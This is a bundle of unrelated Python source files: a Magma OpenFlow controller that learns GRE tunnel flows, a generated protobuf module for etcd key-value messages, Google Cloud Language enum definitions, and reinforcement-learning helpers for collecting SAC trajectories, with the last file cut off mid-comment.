This source code is licensed under the BSD-style license found in the
LICENSE file in the root directory of this source tree. An additional grant
of patent rights can be found in the PATENTS file in the same directory.
"""
from .base import MagmaController, ControllerType
from magma.pipelined.openflow import flows
from magma.pipelined.openflow.magma_match import MagmaMatch
from magma.pipelined.openflow.registers import Direction, DIRECTION_REG
class TunnelLearnController(MagmaController):
    """
    A controller that sets up tunnel/ue learn flows based on uplink UE traffic
    to properly route downlink packets back to the UE (through the correct GRE
    flow tunnel).
    This is an optional controller and will only be used for setups with flow
    based GRE tunnels.
    """

    APP_NAME = "tunnel_learn"
    APP_TYPE = ControllerType.PHYSICAL

    def __init__(self, *args, **kwargs):
        super(TunnelLearnController, self).__init__(*args, **kwargs)
        # Main table owned by this app and the next table in the pipeline.
        self.tbl_num = self._service_manager.get_table_num(self.APP_NAME)
        self.next_table = \
            self._service_manager.get_next_table_num(self.APP_NAME)
        # Scratch table that will hold the dynamically learned per-UE flows.
        self.tunnel_learn_scratch = \
            self._service_manager.allocate_scratch_tables(self.APP_NAME, 1)[0]
        self._datapath = None

    def initialize_on_connect(self, datapath):
        """Install the default classify flows when the datapath connects."""
        self._datapath = datapath
        self._install_default_tunnel_classify_flows(self._datapath)

    def _install_default_tunnel_classify_flows(self, dp):
        """
        For direction OUT:
            add flow with learn action(which will add a rule matching on UE
            mac_addr in a scratch table, that will load the necessary
            gre infomration for the incoming(direction IN) flow)
        For direction IN:
            Will get forwarded to the scratch table and matched on the flow
            from the learn action
        Finally will get forwarded to the next table
        """
        parser = dp.ofproto_parser

        # Add a learn action that will match on UE mac, and:
        # load gre tun_id, swap and load gre tun src and gre tun dst mac
        # Example learned flow:
        #   reg1=0x10,dl_dst=aa:29:3e:95:64:40
        #   actions=load:0x1389->NXM_NX_TUN_ID[0..31],
        #           load:0xc0a84666->NXM_NX_TUN_IPV4_DST[],
        #           load:0xc0a84665->NXM_NX_TUN_IPV4_SRC[]
        #
        outbound_match = MagmaMatch(direction=Direction.OUT)
        actions = [
            parser.NXActionLearn(
                table_id=self.tunnel_learn_scratch,
                priority=flows.DEFAULT_PRIORITY,
                specs=[
                    # Learned flow matches packets whose eth_dst equals this
                    # uplink packet's eth_src (i.e. traffic back to the UE).
                    parser.NXFlowSpecMatch(
                        src=('eth_src_nxm', 0),
                        dst=('eth_dst_nxm', 0),
                        n_bits=48
                    ),
                    # Restrict the learned flow to inbound (downlink) packets.
                    parser.NXFlowSpecMatch(
                        src=Direction.IN,
                        dst=(DIRECTION_REG, 0),
                        n_bits=32
                    ),
                    # Carry over the GRE tunnel id from the uplink packet.
                    parser.NXFlowSpecLoad(
                        src=('tunnel_id_nxm', 0),
                        dst=('tunnel_id_nxm', 0),
                        n_bits=32
                    ),
                    # Swap tunnel endpoints: uplink src becomes downlink dst.
                    parser.NXFlowSpecLoad(
                        src=('tun_ipv4_src', 0),
                        dst=('tun_ipv4_dst', 0),
                        n_bits=32
                    ),
                    # TODO This might be getting overwritten by the IP stack,
                    # check if its required
                    parser.NXFlowSpecLoad(
                        src=('tun_ipv4_dst', 0),
                        dst=('tun_ipv4_src', 0),
                        n_bits=32
                    ),
                ]
            )
        ]
        flows.add_resubmit_next_service_flow(dp, self.tbl_num,
                                             outbound_match, actions,
                                             priority=flows.MINIMUM_PRIORITY,
                                             resubmit_table=self.next_table)

        # The inbound match will first send packets to the scratch table,
        # where global registers will be set and the packet will be dropped
        # Then the final action will send packet down the pipelined(with the
        # necessary tunnel information loaded from the scratch table)
        inbound_match = MagmaMatch(direction=Direction.IN)
        actions = [
            parser.NXActionResubmitTable(table_id=self.tunnel_learn_scratch)]
        flows.add_resubmit_next_service_flow(dp, self.tbl_num,
                                             inbound_match, actions,
                                             priority=flows.MINIMUM_PRIORITY,
                                             resubmit_table=self.next_table)
|
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: kv.proto
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
# Default symbol database; the generated message classes below are
# registered against it so they can be looked up by full name.
_sym_db = _symbol_database.Default()
# File-level descriptor for kv.proto; serialized_pb is the compiled
# FileDescriptorProto for the whole file.
DESCRIPTOR = _descriptor.FileDescriptor(
  name='kv.proto',
  package='mvccpb',
  syntax='proto3',
  serialized_options=b'\n\024com.coreos.jetcd.apiP\001',
  serialized_pb=b'\n\x08kv.proto\x12\x06mvccpb\"u\n\x08KeyValue\x12\x0b\n\x03key\x18\x01 \x01(\x0c\x12\x17\n\x0f\x63reate_revision\x18\x02 \x01(\x03\x12\x14\n\x0cmod_revision\x18\x03 \x01(\x03\x12\x0f\n\x07version\x18\x04 \x01(\x03\x12\r\n\x05value\x18\x05 \x01(\x0c\x12\r\n\x05lease\x18\x06 \x01(\x03\"\x91\x01\n\x05\x45vent\x12%\n\x04type\x18\x01 \x01(\x0e\x32\x17.mvccpb.Event.EventType\x12\x1c\n\x02kv\x18\x02 \x01(\x0b\x32\x10.mvccpb.KeyValue\x12!\n\x07prev_kv\x18\x03 \x01(\x0b\x32\x10.mvccpb.KeyValue\" \n\tEventType\x12\x07\n\x03PUT\x10\x00\x12\n\n\x06\x44\x45LETE\x10\x01\x42\x18\n\x14\x63om.coreos.jetcd.apiP\x01\x62\x06proto3'
)
# Descriptor for the nested mvccpb.Event.EventType enum (PUT / DELETE).
_EVENT_EVENTTYPE = _descriptor.EnumDescriptor(
  name='EventType',
  full_name='mvccpb.Event.EventType',
  filename=None,
  file=DESCRIPTOR,
  values=[
    _descriptor.EnumValueDescriptor(
      name='PUT', index=0, number=0,
      serialized_options=None,
      type=None),
    _descriptor.EnumValueDescriptor(
      name='DELETE', index=1, number=1,
      serialized_options=None,
      type=None),
  ],
  containing_type=None,
  serialized_options=None,
  serialized_start=253,
  serialized_end=285,
)
_sym_db.RegisterEnumDescriptor(_EVENT_EVENTTYPE)
# Descriptor for the mvccpb.KeyValue message (key, revisions, version,
# value, lease).
_KEYVALUE = _descriptor.Descriptor(
  name='KeyValue',
  full_name='mvccpb.KeyValue',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
    _descriptor.FieldDescriptor(
      name='key', full_name='mvccpb.KeyValue.key', index=0,
      number=1, type=12, cpp_type=9, label=1,
      has_default_value=False, default_value=b"",
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='create_revision', full_name='mvccpb.KeyValue.create_revision', index=1,
      number=2, type=3, cpp_type=2, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='mod_revision', full_name='mvccpb.KeyValue.mod_revision', index=2,
      number=3, type=3, cpp_type=2, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='version', full_name='mvccpb.KeyValue.version', index=3,
      number=4, type=3, cpp_type=2, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='value', full_name='mvccpb.KeyValue.value', index=4,
      number=5, type=12, cpp_type=9, label=1,
      has_default_value=False, default_value=b"",
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='lease', full_name='mvccpb.KeyValue.lease', index=5,
      number=6, type=3, cpp_type=2, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=20,
  serialized_end=137,
)
# Descriptor for the mvccpb.Event message (type, kv, prev_kv).
_EVENT = _descriptor.Descriptor(
  name='Event',
  full_name='mvccpb.Event',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
    _descriptor.FieldDescriptor(
      name='type', full_name='mvccpb.Event.type', index=0,
      number=1, type=14, cpp_type=8, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='kv', full_name='mvccpb.Event.kv', index=1,
      number=2, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='prev_kv', full_name='mvccpb.Event.prev_kv', index=2,
      number=3, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
    _EVENT_EVENTTYPE,
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=140,
  serialized_end=285,
)
# Wire up cross-references between the descriptors, then register the file.
_EVENT.fields_by_name['type'].enum_type = _EVENT_EVENTTYPE
_EVENT.fields_by_name['kv'].message_type = _KEYVALUE
_EVENT.fields_by_name['prev_kv'].message_type = _KEYVALUE
_EVENT_EVENTTYPE.containing_type = _EVENT
DESCRIPTOR.message_types_by_name['KeyValue'] = _KEYVALUE
DESCRIPTOR.message_types_by_name['Event'] = _EVENT
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
# Concrete message classes generated from the descriptors above.
KeyValue = _reflection.GeneratedProtocolMessageType('KeyValue', (_message.Message,), {
  'DESCRIPTOR' : _KEYVALUE,
  '__module__' : 'kv_pb2'
  # @@protoc_insertion_point(class_scope:mvccpb.KeyValue)
  })
_sym_db.RegisterMessage(KeyValue)
Event = _reflection.GeneratedProtocolMessageType('Event', (_message.Message,), {
  'DESCRIPTOR' : _EVENT,
  '__module__' : 'kv_pb2'
  # @@protoc_insertion_point(class_scope:mvccpb.Event)
  })
_sym_db.RegisterMessage(Event)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
|
# -*- coding: utf-8 -*-
#
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Wrappers for protocol buffer enum types."""
import enum
class EncodingType(enum.IntEnum):
    """
    Represents the text encoding that the caller uses to process the output.
    Providing an ``EncodingType`` is recommended because the API provides
    the beginning offsets for various outputs, such as tokens and mentions,
    and languages that natively use different text encodings may access
    offsets differently.
    Attributes:
      NONE (int): If ``EncodingType`` is not specified, encoding-dependent information
        (such as ``begin_offset``) will be set at ``-1``.
      UTF8 (int): Encoding-dependent information (such as ``begin_offset``) is calculated
        based on the UTF-8 encoding of the input. C++ and Go are examples of
        languages that use this encoding natively.
      UTF16 (int): Encoding-dependent information (such as ``begin_offset``) is calculated
        based on the UTF-16 encoding of the input. Java and JavaScript are
        examples of languages that use this encoding natively.
      UTF32 (int): Encoding-dependent information (such as ``begin_offset``) is calculated
        based on the UTF-32 encoding of the input. Python is an example of a
        language that uses this encoding natively.
    """
    # Numeric values mirror the wrapped protocol buffer enum (see module
    # docstring); do not renumber.
    NONE = 0
    UTF8 = 1
    UTF16 = 2
    UTF32 = 3
class DependencyEdge(object):
    """Namespace wrapper for the dependency-parse enum types (see ``Label``)."""
    class Label(enum.IntEnum):
        """
        The parse label enum for the token.
        Attributes:
          UNKNOWN (int): Unknown
          ABBREV (int): Abbreviation modifier
          ACOMP (int): Adjectival complement
          ADVCL (int): Adverbial clause modifier
          ADVMOD (int): Adverbial modifier
          AMOD (int): Adjectival modifier of an NP
          APPOS (int): Appositional modifier of an NP
          ATTR (int): Attribute dependent of a copular verb
          AUX (int): Auxiliary (non-main) verb
          AUXPASS (int): Passive auxiliary
          CC (int): Coordinating conjunction
          CCOMP (int): Clausal complement of a verb or adjective
          CONJ (int): Conjunct
          CSUBJ (int): Clausal subject
          CSUBJPASS (int): Clausal passive subject
          DEP (int): Dependency (unable to determine)
          DET (int): Determiner
          DISCOURSE (int): Discourse
          DOBJ (int): Direct object
          EXPL (int): Expletive
          GOESWITH (int): Goes with (part of a word in a text not well edited)
          IOBJ (int): Indirect object
          MARK (int): Marker (word introducing a subordinate clause)
          MWE (int): Multi-word expression
          MWV (int): Multi-word verbal expression
          NEG (int): Negation modifier
          NN (int): Noun compound modifier
          NPADVMOD (int): Noun phrase used as an adverbial modifier
          NSUBJ (int): Nominal subject
          NSUBJPASS (int): Passive nominal subject
          NUM (int): Numeric modifier of a noun
          NUMBER (int): Element of compound number
          P (int): Punctuation mark
          PARATAXIS (int): Parataxis relation
          PARTMOD (int): Participial modifier
          PCOMP (int): The complement of a preposition is a clause
          POBJ (int): Object of a preposition
          POSS (int): Possession modifier
          POSTNEG (int): Postverbal negative particle
          PRECOMP (int): Predicate complement
          PRECONJ (int): Preconjunt
          PREDET (int): Predeterminer
          PREF (int): Prefix
          PREP (int): Prepositional modifier
          PRONL (int): The relationship between a verb and verbal morpheme
          PRT (int): Particle
          PS (int): Associative or possessive marker
          QUANTMOD (int): Quantifier phrase modifier
          RCMOD (int): Relative clause modifier
          RCMODREL (int): Complementizer in relative clause
          RDROP (int): Ellipsis without a preceding predicate
          REF (int): Referent
          REMNANT (int): Remnant
          REPARANDUM (int): Reparandum
          ROOT (int): Root
          SNUM (int): Suffix specifying a unit of number
          SUFF (int): Suffix
          TMOD (int): Temporal modifier
          TOPIC (int): Topic marker
          VMOD (int): Clause headed by an infinite form of the verb that modifies a noun
          VOCATIVE (int): Vocative
          XCOMP (int): Open clausal complement
          SUFFIX (int): Name suffix
          TITLE (int): Name title
          ADVPHMOD (int): Adverbial phrase modifier
          AUXCAUS (int): Causative auxiliary
          AUXVV (int): Helper auxiliary
          DTMOD (int): Rentaishi (Prenominal modifier)
          FOREIGN (int): Foreign words
          KW (int): Keyword
          LIST (int): List for chains of comparable items
          NOMC (int): Nominalized clause
          NOMCSUBJ (int): Nominalized clausal subject
          NOMCSUBJPASS (int): Nominalized clausal passive
          NUMC (int): Compound of numeric modifier
          COP (int): Copula
          DISLOCATED (int): Dislocated relation (for fronted/topicalized elements)
          ASP (int): Aspect marker
          GMOD (int): Genitive modifier
          GOBJ (int): Genitive object
          INFMOD (int): Infinitival modifier
          MES (int): Measure
          NCOMP (int): Nominal complement of a noun
        """
        # Numeric values mirror the wrapped protocol buffer enum; do not renumber.
        UNKNOWN = 0
        ABBREV = 1
        ACOMP = 2
        ADVCL = 3
        ADVMOD = 4
        AMOD = 5
        APPOS = 6
        ATTR = 7
        AUX = 8
        AUXPASS = 9
        CC = 10
        CCOMP = 11
        CONJ = 12
        CSUBJ = 13
        CSUBJPASS = 14
        DEP = 15
        DET = 16
        DISCOURSE = 17
        DOBJ = 18
        EXPL = 19
        GOESWITH = 20
        IOBJ = 21
        MARK = 22
        MWE = 23
        MWV = 24
        NEG = 25
        NN = 26
        NPADVMOD = 27
        NSUBJ = 28
        NSUBJPASS = 29
        NUM = 30
        NUMBER = 31
        P = 32
        PARATAXIS = 33
        PARTMOD = 34
        PCOMP = 35
        POBJ = 36
        POSS = 37
        POSTNEG = 38
        PRECOMP = 39
        PRECONJ = 40
        PREDET = 41
        PREF = 42
        PREP = 43
        PRONL = 44
        PRT = 45
        PS = 46
        QUANTMOD = 47
        RCMOD = 48
        RCMODREL = 49
        RDROP = 50
        REF = 51
        REMNANT = 52
        REPARANDUM = 53
        ROOT = 54
        SNUM = 55
        SUFF = 56
        TMOD = 57
        TOPIC = 58
        VMOD = 59
        VOCATIVE = 60
        XCOMP = 61
        SUFFIX = 62
        TITLE = 63
        ADVPHMOD = 64
        AUXCAUS = 65
        AUXVV = 66
        DTMOD = 67
        FOREIGN = 68
        KW = 69
        LIST = 70
        NOMC = 71
        NOMCSUBJ = 72
        NOMCSUBJPASS = 73
        NUMC = 74
        COP = 75
        DISLOCATED = 76
        ASP = 77
        GMOD = 78
        GOBJ = 79
        INFMOD = 80
        MES = 81
        NCOMP = 82
class Document(object):
    """Namespace wrapper for document-level enum types (see ``Type``)."""
    class Type(enum.IntEnum):
        """
        The document types enum.
        Attributes:
          TYPE_UNSPECIFIED (int): The content type is not specified.
          PLAIN_TEXT (int): Plain text
          HTML (int): HTML
        """
        TYPE_UNSPECIFIED = 0
        PLAIN_TEXT = 1
        HTML = 2
class Entity(object):
    """Namespace wrapper for entity enum types (see ``Type``)."""
    class Type(enum.IntEnum):
        """
        The type of the entity. For most entity types, the associated metadata
        is a Wikipedia URL (``wikipedia_url``) and Knowledge Graph MID
        (``mid``). The table below lists the associated fields for entities that
        have different metadata.
        Attributes:
          UNKNOWN (int): Unknown
          PERSON (int): Person
          LOCATION (int): Location
          ORGANIZATION (int): Organization
          EVENT (int): Event
          WORK_OF_ART (int): Artwork
          CONSUMER_GOOD (int): Consumer product
          OTHER (int): Other types of entities
          PHONE_NUMBER (int): Phone number The metadata lists the phone number, formatted according to
          local convention, plus whichever additional elements appear in the text:
          .. raw:: html
          <li><code>number</code> &#8211; the actual number, broken down into
          sections as per local convention</li> <li><code>national_prefix</code>
          &#8211; country code, if detected</li> <li><code>area_code</code> &#8211;
          region or area code, if detected</li> <li><code>extension</code> &#8211;
          phone extension (to be dialed after connection), if detected</li></ul>
          ADDRESS (int): Address The metadata identifies the street number and locality plus
          whichever additional elements appear in the text:
          .. raw:: html
          <li><code>street_number</code> &#8211; street number</li>
          <li><code>locality</code> &#8211; city or town</li>
          <li><code>street_name</code> &#8211; street/route name, if detected</li>
          <li><code>postal_code</code> &#8211; postal code, if detected</li>
          <li><code>country</code> &#8211; country, if detected</li>
          <li><code>broad_region</code> &#8211; administrative area, such as the
          state, if detected</li> <li><code>narrow_region</code> &#8211; smaller
          administrative area, such as county, if detected</li>
          <li><code>sublocality</code> &#8211; used in Asian addresses to demark a
          district within a city, if detected</li></ul>
          DATE (int): Date<br><br>
          The metadata identifies the components of the date:<ul>
          <li><code>year</code> &#8211; four digit year, if detected</li>
          <li><code>month</code> &#8211; two digit month number, if detected</li>
          <li><code>day</code> &#8211; two digit day number, if detected</li></ul>
          NUMBER (int): Number<br><br>
          The metadata is the number itself.
          PRICE (int): Price<br><br>
          The metadata identifies the <code>value</code> and <code>currency</code>.
        """
        # NOTE: the value 8 is intentionally absent in the wrapped proto enum
        # (PHONE_NUMBER starts at 9); do not renumber.
        UNKNOWN = 0
        PERSON = 1
        LOCATION = 2
        ORGANIZATION = 3
        EVENT = 4
        WORK_OF_ART = 5
        CONSUMER_GOOD = 6
        OTHER = 7
        PHONE_NUMBER = 9
        ADDRESS = 10
        DATE = 11
        NUMBER = 12
        PRICE = 13
class EntityMention(object):
    """Namespace wrapper for entity-mention enum types (see ``Type``)."""
    class Type(enum.IntEnum):
        """
        The supported types of mentions.
        Attributes:
          TYPE_UNKNOWN (int): Unknown
          PROPER (int): Proper name
          COMMON (int): Common noun (or noun compound)
        """
        TYPE_UNKNOWN = 0
        PROPER = 1
        COMMON = 2
class PartOfSpeech(object):
    """Namespace wrapper for part-of-speech enum types (``Aspect``, ``Case``,
    ``Form``, ``Gender``, ``Mood``, ``Number``, ``Person``, ``Proper``,
    ``Reciprocity``, ``Tag``, ``Tense``, ``Voice``)."""
    class Aspect(enum.IntEnum):
        """
        The characteristic of a verb that expresses time flow during an event.
        Attributes:
          ASPECT_UNKNOWN (int): Aspect is not applicable in the analyzed language or is not predicted.
          PERFECTIVE (int): Perfective
          IMPERFECTIVE (int): Imperfective
          PROGRESSIVE (int): Progressive
        """
        ASPECT_UNKNOWN = 0
        PERFECTIVE = 1
        IMPERFECTIVE = 2
        PROGRESSIVE = 3
    class Case(enum.IntEnum):
        """
        The grammatical function performed by a noun or pronoun in a phrase,
        clause, or sentence. In some languages, other parts of speech, such as
        adjective and determiner, take case inflection in agreement with the noun.
        Attributes:
          CASE_UNKNOWN (int): Case is not applicable in the analyzed language or is not predicted.
          ACCUSATIVE (int): Accusative
          ADVERBIAL (int): Adverbial
          COMPLEMENTIVE (int): Complementive
          DATIVE (int): Dative
          GENITIVE (int): Genitive
          INSTRUMENTAL (int): Instrumental
          LOCATIVE (int): Locative
          NOMINATIVE (int): Nominative
          OBLIQUE (int): Oblique
          PARTITIVE (int): Partitive
          PREPOSITIONAL (int): Prepositional
          REFLEXIVE_CASE (int): Reflexive
          RELATIVE_CASE (int): Relative
          VOCATIVE (int): Vocative
        """
        CASE_UNKNOWN = 0
        ACCUSATIVE = 1
        ADVERBIAL = 2
        COMPLEMENTIVE = 3
        DATIVE = 4
        GENITIVE = 5
        INSTRUMENTAL = 6
        LOCATIVE = 7
        NOMINATIVE = 8
        OBLIQUE = 9
        PARTITIVE = 10
        PREPOSITIONAL = 11
        REFLEXIVE_CASE = 12
        RELATIVE_CASE = 13
        VOCATIVE = 14
    class Form(enum.IntEnum):
        """
        Depending on the language, Form can be categorizing different forms of
        verbs, adjectives, adverbs, etc. For example, categorizing inflected
        endings of verbs and adjectives or distinguishing between short and long
        forms of adjectives and participles
        Attributes:
          FORM_UNKNOWN (int): Form is not applicable in the analyzed language or is not predicted.
          ADNOMIAL (int): Adnomial
          AUXILIARY (int): Auxiliary
          COMPLEMENTIZER (int): Complementizer
          FINAL_ENDING (int): Final ending
          GERUND (int): Gerund
          REALIS (int): Realis
          IRREALIS (int): Irrealis
          SHORT (int): Short form
          LONG (int): Long form
          ORDER (int): Order form
          SPECIFIC (int): Specific form
        """
        FORM_UNKNOWN = 0
        ADNOMIAL = 1
        AUXILIARY = 2
        COMPLEMENTIZER = 3
        FINAL_ENDING = 4
        GERUND = 5
        REALIS = 6
        IRREALIS = 7
        SHORT = 8
        LONG = 9
        ORDER = 10
        SPECIFIC = 11
    class Gender(enum.IntEnum):
        """
        Gender classes of nouns reflected in the behaviour of associated words.
        Attributes:
          GENDER_UNKNOWN (int): Gender is not applicable in the analyzed language or is not predicted.
          FEMININE (int): Feminine
          MASCULINE (int): Masculine
          NEUTER (int): Neuter
        """
        GENDER_UNKNOWN = 0
        FEMININE = 1
        MASCULINE = 2
        NEUTER = 3
    class Mood(enum.IntEnum):
        """
        The grammatical feature of verbs, used for showing modality and attitude.
        Attributes:
          MOOD_UNKNOWN (int): Mood is not applicable in the analyzed language or is not predicted.
          CONDITIONAL_MOOD (int): Conditional
          IMPERATIVE (int): Imperative
          INDICATIVE (int): Indicative
          INTERROGATIVE (int): Interrogative
          JUSSIVE (int): Jussive
          SUBJUNCTIVE (int): Subjunctive
        """
        MOOD_UNKNOWN = 0
        CONDITIONAL_MOOD = 1
        IMPERATIVE = 2
        INDICATIVE = 3
        INTERROGATIVE = 4
        JUSSIVE = 5
        SUBJUNCTIVE = 6
    class Number(enum.IntEnum):
        """
        Count distinctions.
        Attributes:
          NUMBER_UNKNOWN (int): Number is not applicable in the analyzed language or is not predicted.
          SINGULAR (int): Singular
          PLURAL (int): Plural
          DUAL (int): Dual
        """
        NUMBER_UNKNOWN = 0
        SINGULAR = 1
        PLURAL = 2
        DUAL = 3
    class Person(enum.IntEnum):
        """
        The distinction between the speaker, second person, third person, etc.
        Attributes:
          PERSON_UNKNOWN (int): Person is not applicable in the analyzed language or is not predicted.
          FIRST (int): First
          SECOND (int): Second
          THIRD (int): Third
          REFLEXIVE_PERSON (int): Reflexive
        """
        PERSON_UNKNOWN = 0
        FIRST = 1
        SECOND = 2
        THIRD = 3
        REFLEXIVE_PERSON = 4
    class Proper(enum.IntEnum):
        """
        This category shows if the token is part of a proper name.
        Attributes:
          PROPER_UNKNOWN (int): Proper is not applicable in the analyzed language or is not predicted.
          PROPER (int): Proper
          NOT_PROPER (int): Not proper
        """
        PROPER_UNKNOWN = 0
        PROPER = 1
        NOT_PROPER = 2
    class Reciprocity(enum.IntEnum):
        """
        Reciprocal features of a pronoun.
        Attributes:
          RECIPROCITY_UNKNOWN (int): Reciprocity is not applicable in the analyzed language or is not
          predicted.
          RECIPROCAL (int): Reciprocal
          NON_RECIPROCAL (int): Non-reciprocal
        """
        RECIPROCITY_UNKNOWN = 0
        RECIPROCAL = 1
        NON_RECIPROCAL = 2
    class Tag(enum.IntEnum):
        """
        The part of speech tags enum.
        Attributes:
          UNKNOWN (int): Unknown
          ADJ (int): Adjective
          ADP (int): Adposition (preposition and postposition)
          ADV (int): Adverb
          CONJ (int): Conjunction
          DET (int): Determiner
          NOUN (int): Noun (common and proper)
          NUM (int): Cardinal number
          PRON (int): Pronoun
          PRT (int): Particle or other function word
          PUNCT (int): Punctuation
          VERB (int): Verb (all tenses and modes)
          X (int): Other: foreign words, typos, abbreviations
          AFFIX (int): Affix
        """
        UNKNOWN = 0
        ADJ = 1
        ADP = 2
        ADV = 3
        CONJ = 4
        DET = 5
        NOUN = 6
        NUM = 7
        PRON = 8
        PRT = 9
        PUNCT = 10
        VERB = 11
        X = 12
        AFFIX = 13
    class Tense(enum.IntEnum):
        """
        Time reference.
        Attributes:
          TENSE_UNKNOWN (int): Tense is not applicable in the analyzed language or is not predicted.
          CONDITIONAL_TENSE (int): Conditional
          FUTURE (int): Future
          PAST (int): Past
          PRESENT (int): Present
          IMPERFECT (int): Imperfect
          PLUPERFECT (int): Pluperfect
        """
        TENSE_UNKNOWN = 0
        CONDITIONAL_TENSE = 1
        FUTURE = 2
        PAST = 3
        PRESENT = 4
        IMPERFECT = 5
        PLUPERFECT = 6
    class Voice(enum.IntEnum):
        """
        The relationship between the action that a verb expresses and the
        participants identified by its arguments.
        Attributes:
          VOICE_UNKNOWN (int): Voice is not applicable in the analyzed language or is not predicted.
          ACTIVE (int): Active
          CAUSATIVE (int): Causative
          PASSIVE (int): Passive
        """
        VOICE_UNKNOWN = 0
        ACTIVE = 1
        CAUSATIVE = 2
        PASSIVE = 3
|
import numpy as np
import torch
from utils.it_estimator import entropy as it_entropy
from utils.it_estimator import kldiv
from scipy.stats import multivariate_normal
# Collect samples using the SAC policy
def collect_trajectories_policy(env, sac_agent, n=10000, state_indices=None):
    '''
    Roll out n trajectories in a batched env using sac_agent.

    :return: tuple of
        Nx(T-1)x|S| state array (the initial state is dropped so states
        line up with the actions that produced them),
        Nx(T-1)x|A| action array,
        Nx(T-1) action log-prob array.
        When state_indices is given, only those state dimensions are kept.
    '''
    horizon = env.T
    obs_dim = env.observation_space.shape[0]
    act_dim = env.action_space.shape[0]
    states = np.empty((n, horizon, obs_dim), dtype=np.float32)
    actions = np.empty((n, horizon - 1, act_dim), dtype=np.float32)
    logprobs = np.empty((n, horizon - 1))
    obs = env.reset(n)
    for step in range(horizon - 1):
        act, logpi = sac_agent.get_action_batch(obs)
        nxt_obs, _, _, _ = env.step(act)  # reward is assigned online by the env
        states[:, step, :] = obs
        actions[:, step, :] = act
        logprobs[:, step] = logpi
        obs = nxt_obs
    states[:, horizon - 1, :] = obs
    states = states[:, 1:, :]  # drop the initial state
    if state_indices is None:
        return states, actions, logprobs
    return states[:, :, state_indices], actions, logprobs
def collect_trajectories_policy_single(env, sac_agent, n=2000, state_indices=None, render=False):
    """Roll out n trajectories one episode at a time (non-batched env).

    Returns (states, actions, log-probs) with shapes NxTx|S| (initial state
    dropped), NxTx|A| and NxT, where T = sac_agent.max_ep_len.  When
    state_indices is given, only those state dimensions are kept.
    """
    horizon = sac_agent.max_ep_len
    obs_dim = env.observation_space.shape[0]
    act_dim = env.action_space.shape[0]
    states = np.empty((n, horizon + 1, obs_dim), dtype=np.float32)
    actions = np.empty((n, horizon, act_dim), dtype=np.float32)
    logprobs = np.empty((n, horizon))
    for traj in range(n):
        obs = env.reset()
        for step in range(horizon):
            act, logpi = sac_agent.get_action(obs, get_logprob=True)
            nxt_obs, _, _, _ = env.step(act)  # reward is assigned online by the env
            states[traj, step, :] = obs
            actions[traj, step, :] = act
            logprobs[traj, step] = logpi
            obs = nxt_obs
            if render:
                env.render()
        states[traj, horizon, :] = obs
    states = states[:, 1:, :]  # drop the initial state
    if state_indices is None:
        return states, actions, logprobs
    return states[:, :, state_indices], actions, logprobs
# for KL evaluation
def rejection_sampling(rho_expert, task, env, n=1000, goal_radius=0.5):
    # NOTE(review): dead code — this name is rebound later in this module by
    # `rejection_sampling(env_name, task, rho_expert, range_lim, n=1000)`,
    # so this version is shadowed at import time and never callable;
    # `expert_samples` already uses the later signature.
    #
    # Rejection sampling of rho_expert over the env grid:
    # proposal: uniform distribution on grid
    # k = max (P(x) / Q(x))
    assert task == 'uniform'
    k = 2 # 4.0/math.pi
    size_x, size_y = env.size_x, env.size_y
    Q_density = 1.0/(size_x * size_y)
    Q_samples = np.random.uniform((0,0),(size_x,size_y),size=(n, 2))
    accepts = np.random.uniform(0, 1, size=(n)) <= (rho_expert(Q_samples) / (k * Q_density)) # u <= p(x) / (k * q(x))
    return Q_samples[accepts]
# credit to http://joschu.net/blog/kl-approx.html
# use unbiased, low-variance, nonnegative estimator by John Schulman: f(r) - f'(1) * (r - 1) >= 0
# intuition: E_q[r] = 1, negatively correlated
